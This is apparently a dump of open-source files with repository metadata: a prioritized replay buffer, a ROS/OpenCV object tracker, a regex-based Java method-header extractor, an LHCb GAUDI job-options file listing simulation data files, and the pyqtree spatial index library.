2022-02-03T20:33:17.000Z
|
2022-02-10T22:43:32.000Z
|
exarl/agents/agent_vault/_prioritized_replay.py
|
schr476/EXARL
|
7f4596bd8b3d7960aaf52bc677ceac4f37029834
|
[
"BSD-3-Clause"
] | 40
|
2022-01-25T18:03:12.000Z
|
2022-03-31T21:43:32.000Z
|
exarl/agents/agent_vault/_prioritized_replay.py
|
schr476/EXARL
|
7f4596bd8b3d7960aaf52bc677ceac4f37029834
|
[
"BSD-3-Clause"
] | 1
|
2022-02-10T14:33:30.000Z
|
2022-02-10T14:33:30.000Z
|
import random
import numpy as np
import tensorflow as tf
from collections import deque
class PrioritizedReplayBuffer():
""" Class implements Prioritized Experience Replay (PER)
"""
def __init__(self, maxlen):
""" PER constructor
Args:
maxlen (int): buffer length
"""
self.maxlen = None if maxlen == "none" else maxlen
self.buffer = deque(maxlen=self.maxlen)
self.priorities = deque(maxlen=self.maxlen)
def add(self, experience):
""" Add experiences to buffer
Args:
experience (list): state, action, reward, next_state, done
Returns:
full_buffer (done): True if buffer is full
"""
full_buffer = len(self.buffer) == self.maxlen
self.buffer.append(experience)
self.priorities.append(max(self.priorities, default=1))
return full_buffer
def get_probabilities(self, priority_scale):
""" Get probabilities for experiences
Args:
priority_scale (float64): range [0, 1]
Returns:
sample_probabilities (numpy array): probabilities assigned to experiences based on weighting factor (scale)
"""
scaled_priorities = np.array(self.priorities) ** priority_scale
sample_probabilities = scaled_priorities / sum(scaled_priorities)
return sample_probabilities
def get_importance(self, probabilities):
""" Compute importance
Args:
probabilities (numpy array): experience probabilities
Returns:
importance_normalized (numpy array): normalized importance
"""
importance = 1 / len(self.buffer) * 1 / probabilities
importance_normalized = importance / max(importance)
return importance_normalized
def sample(self, batch_size, priority_scale=1.0):
""" Sample experiences
Args:
batch_size (int): size of batch
priority_scale (float, optional): range = [0, 1]. Defaults to 1.0.
Returns:
samples (list): sampled based on probabilities
importance (numpy array): Importance of samples
sample_indices (array): Indices of samples
"""
sample_size = min(len(self.buffer), batch_size)
sample_probs = self.get_probabilities(priority_scale)
sample_indices = random.choices(range(len(self.buffer)), k=sample_size, weights=sample_probs)
samples = np.array(self.buffer, dtype=object)[sample_indices]
importance = self.get_importance(sample_probs[sample_indices])
return samples, importance, sample_indices
def set_priorities(self, indices, errors, offset=0.1):
""" Set priorities to experiences
Args:
indices (array): sample indices
errors (array): corresponding losses
offset (float, optional): Small offset. Defaults to 0.1.
"""
for i, e in zip(indices, errors):
self.priorities[int(i)] = abs(e) + offset
def get_buffer_length(self):
""" Get buffer length
Returns:
(int): buffer length
"""
return len(self.buffer)
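# Illustrative usage (added example, not part of the original code; the
# transition tuple and the error values are placeholders):
#   buffer = PrioritizedReplayBuffer(maxlen=1000)
#   buffer.add((state, action, reward, next_state, done))   # one experience tuple
#   samples, importance, indices = buffer.sample(batch_size=32, priority_scale=0.7)
#   # ...compute per-sample TD errors for the batch, then refresh priorities:
#   buffer.set_priorities(indices, errors)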
| 32.673469
| 119
| 0.628045
| 3,112
| 0.971893
| 0
| 0
| 0
| 0
| 0
| 0
| 1,483
| 0.463148
|
b8009f8fd07294eb10166608312734f91397abd7
| 5,722
|
py
|
Python
|
rmtt_tracker/scripts/roi_tracker.py
|
cavayangtao/rmtt_ros
|
e89383510373e9ff9c8bb5c43ae719ca575ef2f5
|
[
"BSD-3-Clause"
] | null | null | null |
rmtt_tracker/scripts/roi_tracker.py
|
cavayangtao/rmtt_ros
|
e89383510373e9ff9c8bb5c43ae719ca575ef2f5
|
[
"BSD-3-Clause"
] | null | null | null |
rmtt_tracker/scripts/roi_tracker.py
|
cavayangtao/rmtt_ros
|
e89383510373e9ff9c8bb5c43ae719ca575ef2f5
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/python3
# coding=utf-8
# Environment setup: pip install opencv_contrib_python
# Input topic: tianbot_mini/image_raw/compressed
# Output topic: roi
import sys
import os
import rospy
import sensor_msgs.msg
from cv_bridge import CvBridge
import cv2
import numpy as np
from sensor_msgs.msg import RegionOfInterest as ROI
from sensor_msgs.msg import CompressedImage
br = CvBridge()
class MessageItem(object):
    # Class wrapping a message: holds an image frame plus extra information
def __init__(self,frame,message):
self._frame = frame
self._message = message
def getFrame(self):
        # Image data
return self._frame
def getMessage(self):
        # Text information, in JSON format
return self._message
class Tracker(object):
'''
    Tracker module, used to track a specified target
'''
def __init__(self, tracker_type="TLD", draw_coord=True):
'''
        Initialize the tracker type
'''
        # Get the OpenCV version
(major_ver, minor_ver, subminor_ver) = (cv2.__version__).split('.')
self.tracker_types = ['BOOSTING', 'MIL', 'KCF', 'TLD', 'MEDIANFLOW', 'GOTURN', "CSRT"]
self.tracker_type = tracker_type
self.isWorking = False
self.draw_coord = draw_coord
        # Construct the tracker
if int(major_ver) < 3:
self.tracker = cv2.Tracker_create(tracker_type)
else:
if tracker_type == 'BOOSTING':
self.tracker = cv2.TrackerBoosting_create()
if tracker_type == 'MIL':
self.tracker = cv2.TrackerMIL_create()
if tracker_type == 'KCF':
self.tracker = cv2.TrackerKCF_create()
if tracker_type == 'TLD':
self.tracker = cv2.TrackerTLD_create()
if tracker_type == 'MEDIANFLOW':
self.tracker = cv2.TrackerMedianFlow_create()
if tracker_type == 'GOTURN':
self.tracker = cv2.TrackerGOTURN_create()
if tracker_type == "CSRT":
self.tracker = cv2.TrackerCSRT_create()
def initWorking(self, frame, box):
'''
        Initialize the tracker for a new target
        frame: initial frame used for tracking
        box: region to track
'''
if not self.tracker:
            raise Exception("Tracker not initialized")
status = self.tracker.init(frame, box)
if not status:
            raise Exception("Tracker initialization failed")
self.coord = box
self.isWorking = True
def track(self, frame):
'''
        Run tracking on a frame
'''
message = None
if self.isWorking:
status, self.coord = self.tracker.update(frame)
if status:
message = {"coord": [((int(self.coord[0]), int(self.coord[1])),
(int(self.coord[0] + self.coord[2]), int(self.coord[1] + self.coord[3])))]}
if self.draw_coord:
p1 = (int(self.coord[0]), int(self.coord[1]))
p2 = (int(self.coord[0] + self.coord[2]), int(self.coord[1] + self.coord[3]))
cv2.rectangle(frame, p1, p2, (255, 0, 0), 2, 1)
message['msg'] = self.tracker_type + " is tracking"
                # Update the ROI
if (int(self.coord[0]) <0 or int(self.coord[1]) <0):
tld_roi.x_offset = 0
tld_roi.y_offset = 0
tld_roi.width = 0
tld_roi.height = 0
else:
tld_roi.x_offset = int(self.coord[0])
tld_roi.y_offset = int(self.coord[1])
tld_roi.width = int(self.coord[2])
tld_roi.height = int(self.coord[3])
                # Publish the ROI
pub.publish(tld_roi)
return MessageItem(frame, message)
def compressed_detect_and_draw(compressed_imgmsg):
global br,gFrame,gCapStatus,getFrame,loopGetFrame
if ((getFrame == True) or (loopGetFrame == True)):
gFrame = br.compressed_imgmsg_to_cv2(compressed_imgmsg, "bgr8")
gCapStatus = True
getFrame = True
gFrame = np.zeros((640,640,3), np.uint8)
gCapStatus = False
getFrame = True
loopGetFrame = False
if __name__ == '__main__':
rospy.init_node('tbm_tld_tracker_node')
rospy.Subscriber("/image_raw", sensor_msgs.msg.CompressedImage, compressed_detect_and_draw)
pub = rospy.Publisher("roi",ROI,queue_size=10)
tld_roi = ROI()
# rate = rospy.Rate(10)
# rate.sleep()
# Pick the frame used for ROI selection
print("Press n to render the next frame, press y to use the current frame for ROI selection")
while True:
_key = cv2.waitKey(0) & 0xFF
if(_key == ord('n')):
# gCapStatus,gFrame = gVideoDevice.read()
getFrame = True
if(_key == ord('y')):
break
cv2.imshow("Pick frame",gFrame)
# Draw a box around the region of interest (ROI)
cv2.destroyWindow("Pick frame")
gROI = cv2.selectROI("ROI frame",gFrame,False)
if (not gROI):
print("空框选,退出")
quit()
# Initialize the tracker
gTracker = Tracker(tracker_type="TLD")
gTracker.initWorking(gFrame,gROI)
# Read frames in a loop and start tracking
while not rospy.is_shutdown():
# gCapStatus, gFrame = gVideoDevice.read()
loopGetFrame = True
if(gCapStatus):
# Display the tracking image
_item = gTracker.track(gFrame)
cv2.imshow("Track result",_item.getFrame())
if _item.getMessage():
# Print the tracking data
print(_item.getMessage())
_key = cv2.waitKey(1) & 0xFF
if (_key == ord('q')) | (_key == 27):
break
if (_key == ord('r')) :
# The user asked to reuse the initial ROI
print("User requested to reuse the initial ROI")
gTracker = Tracker(tracker_type="TLD")
gTracker.initWorking(gFrame, gROI)
else:
print("捕获帧失败")
quit()
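For readers who want the tracking loop without the ROS plumbing, here is a minimal sketch of the same OpenCV tracker pattern; the video file name and the CSRT tracker choice are assumptions for illustration only, and tracker availability depends on the OpenCV build.
import cv2
cap = cv2.VideoCapture("example.mp4")  # hypothetical input file
ok, frame = cap.read()
if not ok:
    raise SystemExit("could not read a frame")
box = cv2.selectROI("pick", frame, False)       # user draws the initial box
tracker = cv2.TrackerCSRT_create()              # requires opencv-contrib / recent OpenCV
tracker.init(frame, box)
while True:
    ok, frame = cap.read()
    if not ok:
        break
    ok, box = tracker.update(frame)             # returns (success, (x, y, w, h))
    if ok:
        x, y, w, h = [int(v) for v in box]
        cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)
    cv2.imshow("track", frame)
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break
cap.release()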
| 31.097826
| 113
| 0.54072
| 3,535
| 0.577049
| 0
| 0
| 0
| 0
| 0
| 0
| 1,303
| 0.2127
|
b80101fcb0f7ec764004534f9989b58dc2d327bf
| 4,236
|
py
|
Python
|
api-scanner/method_analysis_job.py
|
ybqdren/Python-JavaAPI-Scanner
|
69e2de07c95a8edf526dfb4b8eb14deec5693061
|
[
"Apache-2.0"
] | null | null | null |
api-scanner/method_analysis_job.py
|
ybqdren/Python-JavaAPI-Scanner
|
69e2de07c95a8edf526dfb4b8eb14deec5693061
|
[
"Apache-2.0"
] | null | null | null |
api-scanner/method_analysis_job.py
|
ybqdren/Python-JavaAPI-Scanner
|
69e2de07c95a8edf526dfb4b8eb14deec5693061
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding:utf-8 -*-
# @Author: ZhaoWen <withzhaowen@126.com>
# @Date: 2021/1/2
# @GiteePath: https://gitee.com/openeuler2020/team-1186152014
from method_analysis_utils.scanner import get_scanner,token_type
import os
import logging.config
from method_analysis_utils.complier import get_complier
# Configure logging
logging.config.fileConfig('logging.conf')
logger = logging.getLogger()
def comfig_complier():
'''
Assemble the complier (parser)
:return: a configured parser
'''
c = get_complier()
return c
def config_scanner():
'''
Assemble the scanner
:return: a value named s, of type scanner -- a configured scanner
'''
s = get_scanner()
# Initialize the object
s.method_list = []
s.left_single = 0
s.right_single = 0
# 1. Method name: method_name_token [a-zA-Z]+ (methods usually follow PascalCase/camelCase conventions, but exceptions are possible)
# 2. Method parameters: param_token ^[(][a-zA-Z0-9.png$\s,<A-Z>]+[)] -> (Properties prop1,Properties prop2)
# 3. Return type: return_type_token primitive type | custom or built-in object | collection | void | generic (even the simplest method header declares a return type)
# 4. Method brace: end_token { -> marks the end of the method header and is the key sign that a line is a method
# Check whether it is an access-control modifier
access_token = token_type("access_token","default|public|protected|private")
# Check whether it is a keyword
key_token = token_type("key_token","final|abstract|static|synchronized")
# Check whether there is a continuation line
next_token = token_type("next_token","[//]+")
# Check whether it is a method whose header continues on the next line
next_method_token = token_type("next_method_token","([a-zA-Z]+)\).*{")
# Check whether it is a required token
imp_token = token_type("imp_token","(.*)([a-zA-Z]+)(\s){0,}(\(.*\))[a-zA-Z\s]{0,}{")
# Irrelevant characters can be handled in plain code; no extra regex is needed
invalid_token = token_type("invalid_token",".*")
# Check whether it is an interface
interface_token = token_type("interface_token","\s(interface)\s|\s(@interface)\s")
# Whether it is a class
class_token = token_type("class_token","(class)\s(.*){(.*)")
# Whether it is package information
package_token = token_type("package_token","^package")
# Whether it is {
left_single_token = token_type("left_single_token","(.*){(.*)")
# Whether it is }
right_single_token = token_type("right_Single_token","(.*)}(.*)")
# Both { and } on the same line
all_single_token = token_type("all_single_token","(.*)}(.*){(.*)")
token_type_dict = {"access_token":access_token,
"key_token":key_token,
"next_token":next_token,
"next_method_token":next_method_token,
"imp_token":imp_token,
"invalid_token":invalid_token,
"interface_token":interface_token,
"class_token":class_token,
"package_token":package_token,
"left_single_token":left_single_token,
"right_single_token":right_single_token,
"all_single_token":all_single_token
}
s.set_token_type(token_type_dict)
return s
def job_start(path):
'''
Entry point of the API analysis tool
:return: the sets of externally accessible and externally inaccessible APIs
'''
s = config_scanner()
isClass = False
###### Start scanning the source code #######
s.read_file(path)
method_list = s.find_method()
# Check whether method_list.pop(-1) is True or False
if method_list.pop(-1):
isClass = True
for m in method_list:
logging.info(m)
logger.info("总共提取到:(" + str(len(method_list)) + ") 行")
else:
logging.info("不是待提取文件")
s.close_file()
###########################
#### Start parsing the extracted method headers ####
c = comfig_complier()
# Define two lists: one for externally accessible methods, the other for methods that are not externally accessible
public_list = []
unpublic_list = []
info_list = []
c.complier_start()
for i in method_list:
if type(i) != dict:
if c.complier_method(i):
public_list.append(i)
logger.info("public -> "+i)
else:
unpublic_list.append(i)
logger.info("unpublic -> "+i)
else:
try:
info_list.append(i["package"].replace(";", "").strip())
info_list.append(i["class"].replace("{", "").strip())
except KeyError as e:
logging.info(str(type(e))+"......"+str(e.args))
c.complier_close()
###########################
# File/class info | externally accessible API list | internal-only API list | whether this is an extractable class file (i.e. not an interface etc.)
return [info_list,public_list,unpublic_list,isClass]
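As a hedged illustration of the core idea above -- the imp_token pattern is what flags Java method headers -- here is a small standalone check; the sample strings are invented and re.search is used for simplicity:
import re
imp_token = re.compile(r"(.*)([a-zA-Z]+)(\s){0,}(\(.*\))[a-zA-Z\s]{0,}{")
samples = [
    "public static int add(int a, int b) {",   # method header -> matches
    "private String name;",                    # field declaration -> no match
]
for line in samples:
    print(line, "->", bool(imp_token.search(line)))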
| 28.24
| 96
| 0.581681
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,471
| 0.494596
|
b8014951415d289b10583d9f4dc51aea80536fbd
| 4,905
|
py
|
Python
|
ksteta3pi/Consideredbkg/MC_12_11134011_MagUp.py
|
Williams224/davinci-scripts
|
730642d2ff13543eca4073a4ce0932631195de56
|
[
"MIT"
] | null | null | null |
ksteta3pi/Consideredbkg/MC_12_11134011_MagUp.py
|
Williams224/davinci-scripts
|
730642d2ff13543eca4073a4ce0932631195de56
|
[
"MIT"
] | null | null | null |
ksteta3pi/Consideredbkg/MC_12_11134011_MagUp.py
|
Williams224/davinci-scripts
|
730642d2ff13543eca4073a4ce0932631195de56
|
[
"MIT"
] | null | null | null |
#-- GAUDI jobOptions generated on Mon Jul 20 10:20:49 2015
#-- Contains event types :
#-- 11134011 - 42 files - 900254 events - 251.92 GBytes
#-- Extra information about the data processing phases:
#-- Processing Pass Step-125836
#-- StepId : 125836
#-- StepName : Stripping20-NoPrescalingFlagged for Sim08 - Implicit merging.
#-- ApplicationName : DaVinci
#-- ApplicationVersion : v32r2p1
#-- OptionFiles : $APPCONFIGOPTS/DaVinci/DV-Stripping20-Stripping-MC-NoPrescaling.py;$APPCONFIGOPTS/DaVinci/DataType-2012.py;$APPCONFIGOPTS/DaVinci/InputType-DST.py;$APPCONFIGOPTS/Persistency/Compression-ZLIB-1.py
#-- DDDB : fromPreviousStep
#-- CONDDB : fromPreviousStep
#-- ExtraPackages : AppConfig.v3r164
#-- Visible : Y
#-- Processing Pass Step-127969
#-- StepId : 127969
#-- StepName : Reco14c for MC - 2012
#-- ApplicationName : Brunel
#-- ApplicationVersion : v43r2p11
#-- OptionFiles : $APPCONFIGOPTS/Brunel/DataType-2012.py;$APPCONFIGOPTS/Brunel/MC-WithTruth.py;$APPCONFIGOPTS/Persistency/DST-multipleTCK-2012.py;$APPCONFIGOPTS/Persistency/Compression-ZLIB-1.py
#-- DDDB : fromPreviousStep
#-- CONDDB : fromPreviousStep
#-- ExtraPackages : AppConfig.v3r218
#-- Visible : Y
from Gaudi.Configuration import *
from GaudiConf import IOHelper
IOHelper('ROOT').inputFiles(['LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000001_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000002_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000003_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000004_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000005_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000006_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000007_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000008_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000009_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000010_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000011_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000012_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000013_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000014_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000015_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000016_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000017_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000018_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000019_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000020_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000021_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000022_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000023_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000024_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000025_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000026_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000027_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000029_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000030_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000031_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000032_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000033_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000034_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000035_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000036_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000037_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000038_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000039_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000040_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000041_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000042_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000043_2.AllStreams.dst'
], clear=True)
| 62.088608
| 215
| 0.798777
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 4,685
| 0.955148
|
b801fafbe89ab89d0893778ef60e2212843497d8
| 12,257
|
py
|
Python
|
pyqtree.py
|
GuillemHerrera/Pyqtree
|
4f8491ba543ec26b6bf9272ee3e2f0f455eff259
|
[
"MIT"
] | null | null | null |
pyqtree.py
|
GuillemHerrera/Pyqtree
|
4f8491ba543ec26b6bf9272ee3e2f0f455eff259
|
[
"MIT"
] | null | null | null |
pyqtree.py
|
GuillemHerrera/Pyqtree
|
4f8491ba543ec26b6bf9272ee3e2f0f455eff259
|
[
"MIT"
] | null | null | null |
"""
# Pyqtree
Pyqtree is a pure Python spatial index for GIS or rendering usage.
It stores and quickly retrieves items from a 2x2 rectangular grid area,
and grows in depth and detail as more items are added.
The actual quad tree implementation is adapted from
[Matt Rasmussen's compbio library](https://github.com/mdrasmus/compbio/blob/master/rasmus/quadtree.py)
and extended for geospatial use.
## Platforms
Python 2 and 3.
## Dependencies
Pyqtree is written in pure Python and has no dependencies.
## Installing It
Installing Pyqtree can be done by opening your terminal or commandline and typing:
pip install pyqtree
Alternatively, you can simply download the "pyqtree.py" file and place
it anywhere Python can import it, such as the Python site-packages folder.
## Example Usage
Start your script by importing the quad tree.
from pyqtree import Index
Setup the spatial index, giving it a bounding box area to keep track of.
The bounding box being in a four-tuple: (xmin, ymin, xmax, ymax).
spindex = Index(bbox=(0, 0, 100, 100))
Populate the index with items that you want to be retrieved at a later point,
along with each item's geographic bbox.
# this example assumes you have a list of items with bbox attribute
for item in items:
spindex.insert(item, item.bbox)
Then when you have a region of interest and you wish to retrieve items from that region,
just use the index's intersect method. This quickly gives you a list of the stored items
whose bboxes intersects your region of interests.
overlapbbox = (51, 51, 86, 86)
matches = spindex.intersect(overlapbbox)
There are other things that can be done as well, but that's it for the main usage!
## More Information:
- [Home Page](http://github.com/karimbahgat/Pyqtree)
- [API Documentation](https://karimbahgat.github.io/Pyqtree/)
## License:
This code is free to share, use, reuse, and modify according to the MIT license, see LICENSE.txt.
## Credits:
- Karim Bahgat
- Joschua Gandert
"""
__version__ = "1.0.0"
#PYTHON VERSION CHECK
import sys
PYTHON3 = int(sys.version[0]) == 3
if PYTHON3:
xrange = range
def _normalize_rect(rect):
if len(rect) == 2:
x1, y1 = rect
x2, y2 = rect
else:
x1, y1, x2, y2 = rect
if x1 > x2:
x1, x2 = x2, x1
if y1 > y2:
y1, y2 = y2, y1
return (x1, y1, x2, y2)
def _loopallchildren(parent):
for child in parent.children:
if child.children:
for subchild in _loopallchildren(child):
yield subchild
yield child
class _QuadNode(object):
def __init__(self, item, rect):
self.item = item
self.rect = rect
def __eq__(self, other):
return self.item == other.item and self.rect == other.rect
def __hash__(self):
return hash(self.item)
class _QuadTree(object):
"""
Internal backend version of the index.
The index being used behind the scenes. Has all the same methods as the user
index, but requires more technical arguments when initiating it than the
user-friendly version.
"""
def __init__(self, x, y, width, height, max_items, max_depth, _depth=0, fid=0):
self.nodes = []
self.children = []
self.center = (x, y)
self.width, self.height = width, height
self.max_items = max_items
self.max_depth = max_depth
self._depth = _depth
self.fid = fid
def __iter__(self):
for child in _loopallchildren(self):
yield child
def _insert(self, item, bbox):
rect = _normalize_rect(bbox)
if len(self.children) == 0:
node = _QuadNode(item, rect)
self.nodes.append(node)
if len(self.nodes) > self.max_items and self._depth < self.max_depth:
self._split()
else:
self._insert_into_children(item, rect)
def _remove(self, item, bbox):
rect = _normalize_rect(bbox)
if len(self.children) == 0:
node = _QuadNode(item, rect)
self.nodes.remove(node)
else:
self._remove_from_children(item, rect)
def _intersect(self, rect, results=None, uniq=None):
if results is None:
rect = _normalize_rect(rect)
results = []
uniq = set()
# search children
if self.children:
if rect[0] <= self.center[0]:
if rect[1] <= self.center[1]:
self.children[0]._intersect(rect, results, uniq)
if rect[3] >= self.center[1]:
self.children[1]._intersect(rect, results, uniq)
if rect[2] >= self.center[0]:
if rect[1] <= self.center[1]:
self.children[2]._intersect(rect, results, uniq)
if rect[3] >= self.center[1]:
self.children[3]._intersect(rect, results, uniq)
# search node at this level
for node in self.nodes:
_id = id(node.item)
if (_id not in uniq and
node.rect[2] >= rect[0] and node.rect[0] <= rect[2] and
node.rect[3] >= rect[1] and node.rect[1] <= rect[3]):
results.append(node.item)
uniq.add(_id)
return results
def _insert_into_children(self, item, rect):
# if rect spans center then insert here
if (rect[0] <= self.center[0] and rect[2] >= self.center[0] and
rect[1] <= self.center[1] and rect[3] >= self.center[1]):
node = _QuadNode(item, rect)
self.nodes.append(node)
else:
# try to insert into children
if rect[0] <= self.center[0]:
if rect[1] <= self.center[1]:
self.children[0]._insert(item, rect)
if rect[3] >= self.center[1]:
self.children[1]._insert(item, rect)
if rect[2] > self.center[0]:
if rect[1] <= self.center[1]:
self.children[2]._insert(item, rect)
if rect[3] >= self.center[1]:
self.children[3]._insert(item, rect)
def _remove_from_children(self, item, rect):
# if rect spans center then insert here
if (rect[0] <= self.center[0] and rect[2] >= self.center[0] and
rect[1] <= self.center[1] and rect[3] >= self.center[1]):
node = _QuadNode(item, rect)
self.nodes.remove(node)
else:
# try to remove from children
if rect[0] <= self.center[0]:
if rect[1] <= self.center[1]:
self.children[0]._remove(item, rect)
if rect[3] >= self.center[1]:
self.children[1]._remove(item, rect)
if rect[2] > self.center[0]:
if rect[1] <= self.center[1]:
self.children[2]._remove(item, rect)
if rect[3] >= self.center[1]:
self.children[3]._remove(item, rect)
def _split(self):
quartwidth = self.width / 4.0
quartheight = self.height / 4.0
halfwidth = self.width / 2.0
halfheight = self.height / 2.0
x1 = self.center[0] - quartwidth
x2 = self.center[0] + quartwidth
y1 = self.center[1] - quartheight
y2 = self.center[1] + quartheight
new_depth = self._depth + 1
self.children = [_QuadTree(x1, y1, halfwidth, halfheight,
self.max_items, self.max_depth, new_depth, f'{self.fid}3'),
_QuadTree(x1, y2, halfwidth, halfheight,
self.max_items, self.max_depth, new_depth, f'{self.fid}0'),
_QuadTree(x2, y1, halfwidth, halfheight,
self.max_items, self.max_depth, new_depth, f'{self.fid}2'),
_QuadTree(x2, y2, halfwidth, halfheight,
self.max_items, self.max_depth, new_depth, f'{self.fid}1')]
nodes = self.nodes
self.nodes = []
for node in nodes:
self._insert_into_children(node.item, node.rect)
def __len__(self):
"""
Returns:
- A count of the total number of members/items/nodes inserted
into this quadtree and all of its child trees.
"""
size = 0
for child in self.children:
size += len(child)
size += len(self.nodes)
return size
MAX_ITEMS = 10
MAX_DEPTH = 20
class Index(_QuadTree):
"""
The top spatial index to be created by the user. Once created it can be
populated with geographically placed members that can later be tested for
intersection with a user inputted geographic bounding box. Note that the
index can be iterated through in a for-statement, which loops through all
all the quad instances and lets you access their properties.
Example usage:
>>> spindex = Index(bbox=(0, 0, 100, 100))
>>> spindex.insert('duck', (50, 30, 53, 60))
>>> spindex.insert('cookie', (10, 20, 15, 25))
>>> spindex.insert('python', (40, 50, 95, 90))
>>> results = spindex.intersect((51, 51, 86, 86))
>>> sorted(results)
['duck', 'python']
"""
def __init__(self, bbox=None, x=None, y=None, width=None, height=None, max_items=MAX_ITEMS, max_depth=MAX_DEPTH):
"""
Initiate by specifying either 1) a bbox to keep track of, or 2) with an xy centerpoint and a width and height.
Parameters:
- **bbox**: The coordinate system bounding box of the area that the quadtree should
keep track of, as a 4-length sequence (xmin,ymin,xmax,ymax)
- **x**:
The x center coordinate of the area that the quadtree should keep track of.
- **y**
The y center coordinate of the area that the quadtree should keep track of.
- **width**:
How far from the xcenter that the quadtree should look when keeping track.
- **height**:
How far from the ycenter that the quadtree should look when keeping track
- **max_items** (optional): The maximum number of items allowed per quad before splitting
up into four new subquads. Default is 10.
- **max_depth** (optional): The maximum levels of nested subquads, after which no more splitting
occurs and the bottommost quad nodes may grow indefinitely. Default is 20.
"""
if bbox is not None:
x1, y1, x2, y2 = bbox
width, height = abs(x2-x1), abs(y2-y1)
midx, midy = x1+width/2.0, y1+height/2.0
super(Index, self).__init__(midx, midy, width, height, max_items, max_depth)
elif None not in (x, y, width, height):
super(Index, self).__init__(x, y, width, height, max_items, max_depth)
else:
raise Exception("Either the bbox argument must be set, or the x, y, width, and height arguments must be set")
def insert(self, item, bbox):
"""
Inserts an item into the quadtree along with its bounding box.
Parameters:
- **item**: The item to insert into the index, which will be returned by the intersection method
- **bbox**: The spatial bounding box tuple of the item, with four members (xmin,ymin,xmax,ymax)
"""
self._insert(item, bbox)
def remove(self, item, bbox):
"""
Removes an item from the quadtree.
Parameters:
- **item**: The item to remove from the index
- **bbox**: The spatial bounding box tuple of the item, with four members (xmin,ymin,xmax,ymax)
Both parameters need to exactly match the parameters provided to the insert method.
"""
self._remove(item, bbox)
def intersect(self, bbox):
"""
Intersects an input boundingbox rectangle with all of the items
contained in the quadtree.
Parameters:
- **bbox**: A spatial bounding box tuple with four members (xmin,ymin,xmax,ymax)
Returns:
- A list of inserted items whose bounding boxes intersect with the input bbox.
"""
return self._intersect(bbox)
